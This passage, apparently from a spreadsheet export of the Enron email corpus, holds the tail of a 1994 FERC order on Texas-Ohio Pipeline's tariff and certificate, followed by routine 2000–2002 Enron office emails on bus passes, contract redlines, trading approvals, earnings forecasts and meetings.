than a year, section 284.14(b)(1)(xiii) requires the pipeline to establish=_x000D_
=20_x000D_
right_x000D_
of first refusal procedures for use upon expiration of the long-term contra=_x000D_
ct._x000D_
Texas-Ohio's pro forma tariff does not comply with these requirements; it i=_x000D_
s_x000D_
directed to amend its tariff accordingly._x000D_
_x000D_
3. Capacity Release and Electronic Bulletin Board_x000D_
_x000D_
   Section 284.243 of the Commission's regulations, 18 C.F.R. 284.243,=20_x000D_
requires_x000D_
interstate pipelines offering firm transportation [*17]  to establish a=20_x000D_
capacity_x000D_
release mechanism that allows firm shippers to release all or part of their=_x000D_
=20_x000D_
firm_x000D_
transportation capacity rights to any person who wants to obtain that capac=_x000D_
ity_x000D_
by contracting with the pipeline. The release may be temporary, permanent, =_x000D_
or_x000D_
subject to conditions (i.e., on an interruptible basis). The pipeline must_x000D_
allocate released capacity to the person offering the highest rate (not ove=_x000D_
r=20_x000D_
the_x000D_
maximum rate) and offering to meet any other terms and conditions of the_x000D_
release._x000D_
_x000D_
   Order No. 636 requires pipelines to provide timely and equal access to a=_x000D_
ny_x000D_
and all information necessary for buyers and sellers to arrange gas sales a=_x000D_
nd_x000D_
capacity release, including information regarding the availability of capac=_x000D_
ity_x000D_
at receipt and delivery points, and whether capacity is available from the_x000D_
pipeline directly or through capacity releasing. This information must be=_x000D_
=20_x000D_
posted_x000D_
on an electronic bulletin board (EBB)._x000D_
_x000D_
   Texas-Ohio's proposed tariff lacks these provisions. It must amend its p=_x000D_
ro_x000D_
forma tariff to provide a capacity release mechanism and establish an EBB._x000D_
_x000D_
4. Upstream Capacity_x000D_
_x000D_
Section 284.242 of the Commission's regulations, 18 C.F.R. 284.242, provide=_x000D_
s_x000D_
that an interstate [*18]  pipeline that offers transportation service on a=_x000D_
=20_x000D_
firm_x000D_
basis under subparts B or G of Part 284 must offer, without undue_x000D_
discrimination, to assign to its firm shippers its firm transportation=20_x000D_
capacity,_x000D_
including contract storage, on all upstream pipelines. Texas-Ohio does not_x000D_
appear to hold any upstream capacity. In the tariff filing it is required t=_x000D_
o_x000D_
make to comply with the requirements of Order No. 636, Texas-Ohio should st=_x000D_
ate_x000D_
whether it holds any capacity on upstream pipelines. If it does, Texas-Ohio=_x000D_
=20_x000D_
must_x000D_
=0F,                                                                       =_x000D_
  =20_x000D_
PAGE 8_x000D_
                 69 F.E.R.C. P61,145; 1994 FERC LEXIS 2340, *18_x000D_
_x000D_
revise its tariff to comply with Order No. 636._x000D_
_x000D_
5. Transition Costs_x000D_
_x000D_
   Texas-Ohio's filing predates Order No. 636 and consequently makes no=20_x000D_
comment_x000D_
regarding incurrence of transition costs. Accordingly, we will not make a_x000D_
determination at this time with respect to Texas-Ohio's level of transition_x000D_
costs. III. Docket No. MT94-2-000 Pursuant to our order of December 23, 199=_x000D_
3,_x000D_
Texas-Ohio filed revised tariff sheets in Docket No. MT94-2-000 to comply w=_x000D_
ith_x000D_
the requirements of section 250.16(b), 18 C.F.R. 250.16(b). n13 With the_x000D_
exception of the items discussed below, we find that Texas-Ohio's filing_x000D_
complies with those requirements. n14_x000D_
_x000D_
   n13 Texas-Ohio Pipeline, Inc., 65 FERC 61,387 (1993). Section 250.16 of =_x000D_
the_x000D_
Commission's regulations requires interstate natural gas pipelines that_x000D_
transport natural gas for others pursuant to subparts B, G, H, or K of Part=_x000D_
=20_x000D_
284,_x000D_
and that are affiliated in any way with a natural gas marketing or brokerin=_x000D_
g_x000D_
entity, to file certain information relevant to that relationship._x000D_
_x000D_
   n14 On June 17, 1994, Order No. 566 modified section 250.16(b) effective_x000D_
August 1, 1994 by, among other things, eliminating the requirement that_x000D_
pipelines (1) receive certain information from shippers in requests for_x000D_
transportation service, (2) log and post on the EBB complaints made by=20_x000D_
shippers,_x000D_
and (3) include procedures to communicate pricing and capacity information._x000D_
 [*19]_x000D_
_x000D_
   The tariff sheets filed by Texas-Ohio do not set forth the information_x000D_
required to be filed in a transportation request. Texas-Ohio contends that=_x000D_
=20_x000D_
since_x000D_
it is operating under a temporary certificate and is prohibited from provid=_x000D_
ing_x000D_
transportation service to new customers pending further action on its_x000D_
application, that information is not applicable._x000D_
_x000D_
   While Order No. 566 eliminated certain information previously required t=_x000D_
o=20_x000D_
be_x000D_
provided in the transportation request form, it still requires pipelines to_x000D_
maintain a log of data used to allocate capacity. Texas-Ohio must comply wi=_x000D_
th_x000D_
this provision and file a transportation request form as specified._x000D_
_x000D_
   Texas-Ohio can address this deficiency by either revising existing tarif=_x000D_
f_x000D_
provisions, including its FTS and ITS request form, or by incorporating the_x000D_
changes into Section 16 (Order No. 497 Compliance Procedures) of its propos=_x000D_
ed_x000D_
tariff. Texas-Ohio must make a compliance filing within 45 days of the=20_x000D_
issuance_x000D_
of this order incorporating all information required by Order Nos. 497 and=_x000D_
=20_x000D_
566._x000D_
Additionally, since the tariff sheets Texas-Ohio filed in Docket No.=20_x000D_
MT94-2-000_x000D_
are not pro forma, Texas-Ohio should filed corrected tariff sheets in a for=_x000D_
m_x000D_
[*20]  acceptable to become effective upon issuance of an order in this_x000D_
proceeding._x000D_
_x000D_
IV.Environmental Matters_x000D_
_x000D_
   On August 22, 1990, Texas-Ohio notified the Commission that it intended =_x000D_
to_x000D_
commence construction of the Hunter Pipeline and that the facilities would =_x000D_
be_x000D_
used for the transportation of natural gas under NGPA section 311(a)(2). Th=_x000D_
is_x000D_
notice provided the environmental information required by section 157.206(d=_x000D_
)=20_x000D_
of_x000D_
the Commission's regulations._x000D_
_x000D_
=0F,                                                                       =_x000D_
  =20_x000D_
PAGE 9_x000D_
                 69 F.E.R.C. P61,145; 1994 FERC LEXIS 2340, *20_x000D_
_x000D_
   To ensure that operation of the Hunter Pipeline compressors complies wit=_x000D_
h=20_x000D_
the_x000D_
noise requirements of section 157.206(d)(5), Texas-Ohio must perform a_x000D_
post-construction sound survey of the compressor station. This survey must =_x000D_
be_x000D_
performed not later than 30 days after the date of issuance of this order. =_x000D_
n15_x000D_
Texas-Ohio's application for a Part 157, subpart A certificate to operate t=_x000D_
he_x000D_
Hunter Pipeline and a Part 284, subpart G blanket transportation certificat=_x000D_
e_x000D_
relies solely on the use of existing facilities; no additional construction_x000D_
authorization is requested or granted. Accordingly, subject to Texas-Ohio's_x000D_
compliance with section 157.206(d)(5), we conclude that approval of the=20_x000D_
instant_x000D_
application is not a major Federal action significantly affecting [*21]  th=_x000D_
e_x000D_
quality of the human environment._x000D_
_x000D_
   n15 Section 157.206(d)(5) provides that the noise attributable to any_x000D_
compressor facility shall not exceed a day-night sound level of 55 dB(A) at=_x000D_
=20_x000D_
any_x000D_
existing noise-sensitive areas.V. IESCO's Protest_x000D_
_x000D_
   In its protest and request for an evidentiary hearing, IESCO charges tha=_x000D_
t_x000D_
Texas-Ohio's jurisdictional status must be determined as a precondition to =_x000D_
the_x000D_
issuance of a certificate._x000D_
_x000D_
   IESCO states that if Texas-Ohio was not a interstate pipeline for the=20_x000D_
period_x000D_
from November 1990 through June 3, 1991, it could not legally offer NGPA=20_x000D_
section_x000D_
311(a)(2) service and competing sellers of gas (such as IESCO) could have b=_x000D_
een_x000D_
unfairly deprived of their markets._x000D_
_x000D_
   The Commission's January 15, 1992 order issuing Texas-Ohio a temporary_x000D_
certificate to operate the Hunter Pipeline laid to rest concerns regarding_x000D_
Texas-Ohio's jurisdictional status. Further, Texas-Ohio agreed in the=20_x000D_
settlement_x000D_
approved in the Commission's October 18, 1993, order to comply with the NGA=_x000D_
,_x000D_
NGPA, and the Commission's regulations. This order issues Texas-Ohio a case=_x000D_
-_x000D_
specific certificate pursuant to subpart A of Part 157 and a blanket_x000D_
transportation certificate pursuant to subpart G of [*22]  Part 284. No_x000D_
questions remain as to the jurisdictional status of Texas-Ohio._x000D_
_x000D_
   IESCO then complains that Texas-Ohio should have held an open-season dur=_x000D_
ing_x000D_
which prospective shippers would have an opportunity to obtain services on =_x000D_
the_x000D_
Hunter Pipeline. As discussed above, the Commission has investigated_x000D_
Texas-Ohio's operation and determined, among other things, that Texas-Ohio_x000D_
notified only its marketing affiliate and the marketing affiliate's custome=_x000D_
rs=20_x000D_
of_x000D_
the availability of capacity prior to construction of the Hunter Pipeline. =_x000D_
The_x000D_
Commission's policies require Texas-Ohio to use a non-discriminatory method=_x000D_
 of_x000D_
selecting customers for both firm and interruptible transportation service=_x000D_
=20_x000D_
when_x000D_
operating under Part 284. n16 As noted above, we are holding that Texas-Ohi=_x000D_
o_x000D_
must hold an open season prior to commencing service under its Part 284=20_x000D_
blanket_x000D_
certificate. This approach will ensure that prior notice of firm capacity i=_x000D_
s_x000D_
made available to all interested parties on a contemporaneous basis and in =_x000D_
a_x000D_
non-discriminatory manner. n17_x000D_
_x000D_
   n16 18 C.F.R. 284.8(b) and 284.9(b)._x000D_
_x000D_
   n17 See, e.g., Pacific Gas Transmission Co., 54 FERC 61.035 at 61,154=20_x000D_
(1991);_x000D_
ANR Storage Co., 51 FERC 61,114 at 61.304 (1990). [*23]_x000D_
_x000D_
   IESCO next asserts that Texas-Ohio's proposed tariff does not assure tha=_x000D_
t_x000D_
nondiscriminatory service will be provided. We disagree. Acceptance by_x000D_
=0F,                                                                       =_x000D_
 =20_x000D_
PAGE 10_x000D_
                 69 F.E.R.C. P61,145; 1994 FERC LEXIS 2340, *23_x000D_
_x000D_
Texas-Ohio of the blanket transportation certificate authorized by this ord=_x000D_
er,_x000D_
and as conditioned herein, will subject Texas-Ohio to the full range of the_x000D_
Commission's requirements, including those prohibiting discriminatory=20_x000D_
practices._x000D_
_x000D_
   IESCO states that Texas-Ohio must be required to comply with the provisi=_x000D_
ons_x000D_
of the Affiliated Marketer Rule. As we noted in the order issuing a tempora=_x000D_
ry_x000D_
certificate, Order Nos. 497 and 497-A apply to all interstate pipelines wit=_x000D_
h_x000D_
affiliated marketers. Upon acceptance of the temporary certificate Texas- O=_x000D_
hio_x000D_
became subject to the conditions of those orders. n18 Texas-Ohio's standard=_x000D_
s=20_x000D_
of_x000D_
conduct implementing Order No. 497, filed in Docket No. MG93-5-000, have be=_x000D_
en_x000D_
accepted by the Commission. n19 When Texas-Ohio complies with this order's_x000D_
directions, Texas-Ohio will be in full compliance with Order No. 497._x000D_
_x000D_
   n18 Texas-Ohio Pipeline, Inc., 58 FERC 61.025 (1992)._x000D_
_x000D_
   n19 Texas-Ohio Pipeline, Inc., 65 FERC 61,387 (1993); Texas- Ohio Pipeli=_x000D_
ne,_x000D_
Inc., 67 FERC 61,149 (1994). [*24]_x000D_
_x000D_
   IESCO assert</t>
  </si>
  <si>
    <t>Fri, 28 Dec 2001 09:04:54 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dl-ga-all_enron_houston_employees@enron.com'})</t>
  </si>
  <si>
    <t>Metro Bus Passes and Woodlands Express Passes Available Effective_x000D_
  Friday, December 28, 2001</t>
  </si>
  <si>
    <t>_x000D_
Enron employees not participating in contract parking are eligible to receive Metro Bus Passes or Woodlands Express Passes.  You may pick up a bus pass from the Parking &amp; Transportation Desk, on Level 3 of the Enron Building, from 8:30 AM to 4:30 PM. _x000D_
_x000D_
_x000D_
All Metro passes offered through the Enron Parking &amp; Transportation desk will be the Metro 30 Day Zone Pass.  When you use a 30-day zone pass, bus service is divided into four zones w/ unlimited rides.  The zone pass is time activated, which means that it will not become active until the first time it is used and will not expire until 30 days after it was used for the first time.  New passes will be available to Enron employees upon expiration of the 30 day time period. Each zone does have a different fare values based on the distance the bus travels. This is important to any buser who wants to transfer to or travel in a higher-cost zone than the zone pass they have, in this case the difference must be paid in cash.  If they are traveling in a lower cost zone, then there is no extra cost.  _x000D_
_x000D_
Parking &amp; Transportation Desk_x000D_
3-7060</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 11:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.rigby@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'pthompson@akllp.com', 'bill.williams@enron.com', 'sheila.tweed@enron.com', 'scott.dieball@enron.com'})</t>
  </si>
  <si>
    <t>Rigby's Proposal for Take Over LD's Section 10.3.2</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a redline against the present Take Over LD section of Rev 5 of GE _x000D_
world hunger.   I made the changes based on what we have done in ARCOS. They _x000D_
are not the same because in ARCOS GE has the full testing program within _x000D_
their Commisssioning Period since they have the power island which is 1200 MW _x000D_
with the Purchaser having 24 MW for aux loads._x000D_
_x000D_
I do not think that my new subparagraph (K) works.  I have left it there to _x000D_
see if anyone else can tweak it and make it work.  I am trying to get GE on _x000D_
the hook for acceleration costs that we incur and still beat the Time for _x000D_
Completion.  We did not do that in Arcos since GE's time in theory is the _x000D_
same as the contractors._x000D_
_x000D_
_x000D_
Probably merits an internal discussion before sharing with GE._x000D_
</t>
  </si>
  <si>
    <t>Thu, 4 Oct 2001 18:20:34 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'frank.sayre@enron.com', 'tana.jones@enron.com'})</t>
  </si>
  <si>
    <t>RE: Louis Dreyfus</t>
  </si>
  <si>
    <t>Since they are already trading physical stuff online, they are probably already approved to trade financials as well and the master will just mean they don't have to accept the GTC's to trade the derivatives.  Tana can check quickly and see what they are approved for._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Sayre, Frank  _x000D_
Sent:	Thursday, October 04, 2001 1:09 PM_x000D_
To:	Taylor, Mark E (Legal)_x000D_
Cc:	Panus, Stephanie_x000D_
Subject:	Louis Dreyfus_x000D_
_x000D_
Mark - Louis Dreyfus Energy Services LP is signing their ISDA Master Agreement today and would like to get online to trade with EOL asap.  According to Jennifer McQuatde, they are currently trading physicals online and, she believes, have signed all the necessary docs.  Louis Dreyfus has asked if we would turn them on to trade OTC derivatives online based upon a fax of the signature page to their ISDA.  What is your view on this, oh mighty one?  Frank</t>
  </si>
  <si>
    <t>Wed, 14 Mar 2001 03:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Rebooks</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Eric Bass/HOU/ECT on 03/14/2001 11:47 AM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Julie Brewer @ ENRON                           03/14/2001 11:27 AM_x000D_
	_x000D_
_x000D_
To: Kam Keiser/HOU/ECT@ECT, Victor Guggenheim/HOU/ECT@ECT, Phillip M _x000D_
Love/HOU/ECT@ECT, Sandy Olitsky/HOU/ECT@ECT, Jeffrey C Gossett/HOU/ECT@ECT, _x000D_
Susan M Scott/HOU/ECT@ECT, Janie Aguayo/HOU/ECT@ECT, Larry Joe _x000D_
Hunter/HOU/ECT@ECT, Kim S Theriot/HOU/ECT@ECT, Kara L Boudreau/HOU/ECT, Jean _x000D_
Bell/HOU/ECT@ECT, Jeff Royed/Corp/Enron@ENRON, Anne Bike/Corp/Enron@Enron, _x000D_
Errol McLaughlin/Corp/Enron@ENRON, Laura Vargas/Corp/Enron@ENRON, Luchas _x000D_
Johnson/NA/Enron@Enron, Sherry Dawson/NA/Enron@Enron, Derek _x000D_
Bailey/Corp/Enron@ENRON, Ellen Wallumrod/NA/Enron@ENRON, Michelle _x000D_
Nelson/Corp/Enron, Stewart Range/NA/Enron, Shifali Sharma/NA/Enron, Keynan _x000D_
Dutton/NA/Enron, Carole Frank/NA/Enron@ENRON, Bruce Mills/Corp/Enron@ENRON, _x000D_
Veronica Hill/NA/Enron, Bianca Ornelas/NA/Enron@Enron, George Huan/NA/Enron, _x000D_
Amy Cavazos/NA/Enron@ENRON, Elizabeth Shim/Corp/Enron@ENRON, Ryan _x000D_
O'Rourke/ENRON@enronXgate, Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Rebooks_x000D_
_x000D_
If your name is in the right hand column, please rebook as indicated by _x000D_
Credit._x000D_
_x000D_
_x000D_
_x000D_
Thanks._x000D_
_x000D_
Julie Brewer_x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Mar 2001 07:27:34 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'karen.brostad@enron.com', 'michelle.lokay@enron.com', 'elizabeth.brown@enron.com'})</t>
  </si>
  <si>
    <t>GrossMargin</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Here is the posting for 3/16-3/18.  I will be out on vacation 3/29-3/26.  Michelle will be covering this for me.  Michelle, Jim's phone number at Sempra is 203-355-5065.  You will need to call him for Sempra's daily Cal Border sale price.  Richardson Products is Gas Daily Socal Large Pkgs. minus Gas Daily El Paso Permian.  _x000D_
_x000D_
Thanks for your help._x000D_
_x000D_
ALOHA!_x000D_
_x000D_
TK_x000D_
_x000D_
_x000D_
                          </t>
  </si>
  <si>
    <t>Mon, 17 Jul 2000 19:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rtackett@abacustech.net'})</t>
  </si>
  <si>
    <t>Pictures</t>
  </si>
  <si>
    <t>I had computer problems today, which snarf'd all the addresses that I have_x000D_
previous e-mailed you folks. None of those previous http address are valid_x000D_
any more._x000D_
_x000D_
So, look to http://24.27.98.30/pictures/index.htm to find a table of_x000D_
contents of July pictures. I'll try to keep this updated, as new pictures_x000D_
are posted._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Ram Tackett,  (mailto:rtackett@abacustech.net)_x000D_
Owner, Abacus Technologies_x000D_
17611 Loring Lane, Spring, TX 77388-5746_x000D_
(281)651-7106;Fax(281)528-8636  Web: http://www.abacustech.net_x000D_
_x000D_
 - Ram Tackett (E-mail).vcf</t>
  </si>
  <si>
    <t>Thu, 11 Oct 2001 09:26:33 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'magdelena.cruz@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'anita.phelps@enron.com', 'malcolm.wells@enron.com', 'sarah.dietrich@enron.com', 'bob.hansen@enron.com', 'karima.husain@enron.com', 'j..hanson@enron.com', 'jeff.lewis@enron.com', 'kimberly.watson@enron.com', 'chris.abel@enron.com'})</t>
  </si>
  <si>
    <t>Becoming an Exceptional Leader: manager's training UPDATE</t>
  </si>
  <si>
    <t>REMINDER!!!!_x000D_
_x000D_
* Forum Corporation must receive the completed questionnaires for scoring no later than October 24th. If your direct reports plan on mailing it in, they must but it in the mail TODAY so it will arrive on time for scoring. (it takes 2 weeks to travel)  This also applies to your self evaluation feedback form._x000D_
_x000D_
* Your direct reports can also FedEx the questionnaires after today up to 4 days before the class to the address on the envelope they received._x000D_
_x000D_
* Please enforce your direct reports to fill them out and return them so that you can get an accurate report on the day of the class._x000D_
_x000D_
Thanks. Any questions, please feel free to call me x3-1816._x000D_
_x000D_
Maggie_x000D_
_x000D_
P.S. Cancellations will be penalized at 100% cost.</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 03:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gerald.nemec@enron.com', 'kevin.hyatt@enron.com', 'mark.knippa@enron.com', 'james.centilli@enron.com'})</t>
  </si>
  <si>
    <t>Gallup Compressor Agreement Meeting Today</t>
  </si>
  <si>
    <t>Drew Fossum has scheduled the referenced meeting today for 4:00 - 5:00 pm in _x000D_
conference room 47C-2._x000D_
_x000D_
  Please advise if you will be unable to attend.  Thanks._x000D_
_x000D_
Debra Coleman_x000D_
x36704</t>
  </si>
  <si>
    <t>Wed, 5 Dec 2001 05:52:09 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jmjaked@mindspring.com'})</t>
  </si>
  <si>
    <t>RE: after the storm...</t>
  </si>
  <si>
    <t xml:space="preserve">unbelievable.  Still hanging on here.  We let go of 4,500 of the 7,500 people in Houston.  Crazy stuff.  Will keep in touch._x000D_
PL_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Jason Dobbs" &lt;jmjaked@mindspring.com&gt;@ENRON  _x000D_
Sent:	Wednesday, December 05, 2001 7:51 AM_x000D_
To:	phil love_x000D_
Subject:	Fw: after the storm..._x000D_
_x000D_
Another picture of the tornado.  This one only shows a small area that was_x000D_
hit, but has a good view from above._x000D_
_x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: chris chambless &lt;gwave85@hotmail.com&gt;_x000D_
To: &lt;e_chambless@yahoo.com&gt;; &lt;jmjaked@mindspring.com&gt;; &lt;Murrywhitt@aol.com&gt;;_x000D_
&lt;Shane.Dobbs@fctg.com&gt;_x000D_
Sent: Tuesday, December 04, 2001 12:05 PM_x000D_
Subject: Fwd: after the storm..._x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt;From: wayne jones &lt;wjones@telepak.net&gt;_x000D_
&gt; &gt;To: gwave85@hotmail.com_x000D_
&gt; &gt;Subject: after the storm..._x000D_
&gt; &gt;Date: Mon, 03 Dec 2001 17:01:20 -0600_x000D_
&gt; &gt;_x000D_
&gt; &gt;harlod bearden sent this to me...from the air... looks bad.. .i seen it_x000D_
&gt; &gt;sunday.. i went home to see shanda... later.. yeah, we are going to the_x000D_
&gt; &gt;coast... ill see you there... later the dawg_x000D_
&gt; &gt;_x000D_
&gt; &gt;-----------------------------------------------------_x000D_
&gt; &gt;Click here for Free Video!!_x000D_
&gt; &gt;http://www.gohip.com/freevideo/_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; __________________________________________________________________x000D_
&gt; Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp_x000D_
&gt;_x000D_
_x000D_
 - haley_downtown_03.jpg &lt;&lt; File: haley_downtown_03.jpg &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 05:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lorie.belsha@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Sally,_x000D_
_x000D_
Attached is the spreadsheet you were looking at earlier regarding the new _x000D_
building.  Please review and let me know if there are any changes in the _x000D_
headcount for your groups._x000D_
_x000D_
Thanks_x000D_
_x000D_
Lorie_x000D_
x39617_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 30 Jun 2000 01:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'allan.sommer@enron.com'})</t>
  </si>
  <si>
    <t>Power On-Line</t>
  </si>
  <si>
    <t xml:space="preserve">Allan,_x000D_
Please call Fred and discuss._x000D_
_x000D_
Thanks,_x000D_
mike_x000D_
---------------------- Forwarded by Mike McConnell/HOU/ECT on 06/30/2000 _x000D_
08:36 AM ---------------------------_x000D_
_x000D_
_x000D_
Fred L Kelly@ENRON_DEVELOPMENT_x000D_
06/29/2000 11:39 AM_x000D_
To: Mike McConnell/HOU/ECT@ECT, Cathy Phillips/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Power On-Line_x000D_
_x000D_
Who would you recommend as a contact from Enron?_x000D_
---------------------- Forwarded by Fred L Kelly/ENRON_DEVELOPMENT on _x000D_
06/29/2000 11:35 AM ---------------------------_x000D_
_x000D_
_x000D_
Dale Baker &lt;dbaker@verticalnet.com&gt; on 06/21/2000 08:21:22 AM_x000D_
To: "'Larry.L.Izzo@enron.com &lt;Larry.L.Izzo@enron.com&gt;'" _x000D_
&lt;Larry.L.Izzo@enron.com&gt;_x000D_
cc: "'Dick.Westfahl@enron.com &lt;Dick.Westfahl@enron.com&gt;'" _x000D_
&lt;Dick.Westfahl@enron.com&gt;, "'Fred.L.Kelly@enron.com _x000D_
&lt;Fred.L.Kelly@enron.com&gt;'" &lt;Fred.L.Kelly@enron.com&gt; _x000D_
_x000D_
Subject: Power On-Line_x000D_
_x000D_
_x000D_
Dear Mr. Izzo:_x000D_
_x000D_
I'd like to offer EECC a free "Storefront" on my VerticalNet Web-site Power_x000D_
On-Line._x000D_
_x000D_
http://www.poweronline.com_x000D_
_x000D_
A Storefront is a Company Showcase where EECC can reach the 100K+ visitors_x000D_
that come to Power On-Line to read content, search for products and company_x000D_
information and conduct eCommerce over the Internet._x000D_
_x000D_
Power On-Line is a VerticalNet Community that is dedicated to Power_x000D_
Generation Professionals in the Power Industry worldwide._x000D_
_x000D_
Microsoft has teamed with VerticalNet and will be paying for this service_x000D_
for one year.  It is free, with no commitments or strings attached._x000D_
_x000D_
Please forward to me a contact and telephone number of the person I should_x000D_
further discuss this with at EECC.  Also, if you could forward the same_x000D_
information on a contact at ENRON Corporate, I would like to offer the same_x000D_
opportunity._x000D_
_x000D_
Thank you, for your time._x000D_
_x000D_
DALE G. BAKER_x000D_
VerticalNet, Inc._x000D_
http://www.verticalnet.com_x000D_
Nat'l Sales Manager_x000D_
Power On-Line_x000D_
(215) 219-9706_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Mar 2001 03:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'walter.guidroz@enron.com'})</t>
  </si>
  <si>
    <t>RE: Energy West Inc.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm with you on Montana.  I checked the files in the big file room, and it is _x000D_
a Montana corporation._x000D_
_x000D_
_x000D_
_x000D_
	Walter Guidroz/ENRON@enronXgate_x000D_
	03/06/2001 11:19 AM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: RE: Energy West Inc._x000D_
_x000D_
It should read Energy West Incorporated, but our info shows that they are _x000D_
headquartered and incorporated in Montana.  Please let me know if this _x000D_
differs from your perspective; thanks._x000D_
_x000D_
WG_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Jones, Tana  _x000D_
Sent: Tuesday, March 06, 2001 10:50 AM_x000D_
To: Guidroz, Walter; Moran, Tom_x000D_
Subject: Energy West Inc._x000D_
_x000D_
We have a master swap agreement in place with Energy West Incorporated, a _x000D_
CANADA corporation.  Your list shows "Inc." instead of "Incorporated", and _x000D_
that it is a US corporation.  Is this the same counterparty?_x000D_
</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 08:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jim.piro@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'rod.hayslett@enron.com', 'bob.butts@enron.com', 'stanley.horton@enron.com', 'richard.causey@enron.com'})</t>
  </si>
  <si>
    <t>2001 Earnings</t>
  </si>
  <si>
    <t>Peggy asked that I update you on our earnings forecast for this year._x000D_
_x000D_
PGE had an exceptional April with PGE IBIT of $39.8 million compared to $5.2_x000D_
million budget and Net Income of $20.9 million compared to -$.7 million plan. _x000D_
Earnings for the month were driven primarily by our wholesale business and_x000D_
outstanding plant operations.  Actual net variable power cost for April came_x000D_
in at $.2 million compared to our budget of$43.9 million.  Retail loads were_x000D_
off for the month which created additional length along with strong wholesale_x000D_
prices in the preschedule and real time markets.  _x000D_
_x000D_
April results do not include any charges for Enron overheads which we would_x000D_
expect to start occurring in May.  Kirk Stevens and Mark Lindsey are working_x000D_
on getting these charges allocated to PGE._x000D_
_x000D_
For Q2, our Current Forecast for PGG is to over perform at plan by $1.7_x000D_
million IBIT and 6.3 net income.  The primary driver will still be power cost_x000D_
for May and June.   Recent downward movement in the forward curve has reduced_x000D_
the value of our long position in May and June on a forecast basis.  However,_x000D_
the preschedule and real time markets continue to be strong.  If this trend_x000D_
continues then we should over perform in both May and June.  How much is still_x000D_
highly dependent on wholesale prices, our plant operations, retail loads and_x000D_
weather conditions in the West.  _x000D_
_x000D_
For the year, we are still on track to make our plan but a similar situation_x000D_
to the second quarter exists for us in the third and fourth quarter.  We are_x000D_
holding on to some length in our retail book to hedge our retail load and_x000D_
plant operations.  The value of that length changes on a forecast basis based_x000D_
upon movement in the forward curve.  However, we continue to see the_x000D_
preschedule and real time market trade higher than the forward curve.  In_x000D_
addition, as we discussed before, we have a regulatory mechanism in place_x000D_
where by we share our overall net variable power cost with customers.  Our_x000D_
current power cost forecast has us in the 90 / 10 sharing bandwidth with_x000D_
collection of about $18 million from customers.  If wholesale prices in the_x000D_
preschedule and real time market continue to be strong then we will move into_x000D_
the dead band and could move into the refund zones.   In addition to power_x000D_
cost,  we put in place a goal this year of reducing O&amp;M by 7% from the budget_x000D_
and we are on target to meet this goal._x000D_
_x000D_
Please call me at 503-464-8982 or e-mail me if you have any questions.</t>
  </si>
  <si>
    <t>Wed, 13 Mar 2002 05:39:28 -0800 (PST)</t>
  </si>
  <si>
    <t>It's Happening!</t>
  </si>
  <si>
    <t>Here we go!</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 04:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'miguel.garcia@enron.com', 'chad.starnes@enron.com', 'joe.stepenovitch@enron.com', 'christopher.watts@enron.com', 'lawrence.clayton@enron.com', 'doug.miller@enron.com', 'dean.laurent@enron.com', 'cyril.price@enron.com', 'russell.ballato@enron.com', 'larry.campbell@enron.com', 'jay.wills@enron.com', 'rudy.acevedo@enron.com', 'greg.trefz@enron.com', 'juan.hernandez@enron.com', 'richard.hrabal@enron.com', 'keller.mayeaux@enron.com', 'steve.olinde@enron.com', 'larry.jester@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'joe.errigo@enron.com'})</t>
  </si>
  <si>
    <t>Correction Part II</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kayne Coulter/HOU/ECT on 02/06/2001 12:18 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Michael Jacobson@ENRON_x000D_
02/06/2001 12:13 PM_x000D_
To: Kayne Coulter/HOU/ECT@ECT_x000D_
cc: Rebecca M Grace/HOU/ECT@ECT, Thresa A Allen/HOU/ECT@ECT, Howard B _x000D_
Camp/HOU/ECT@ECT _x000D_
Subject: Correction Part II_x000D_
_x000D_
Kayne,_x000D_
_x000D_
Rebecca brought it to my attention that I got the NY indices reversed.  The _x000D_
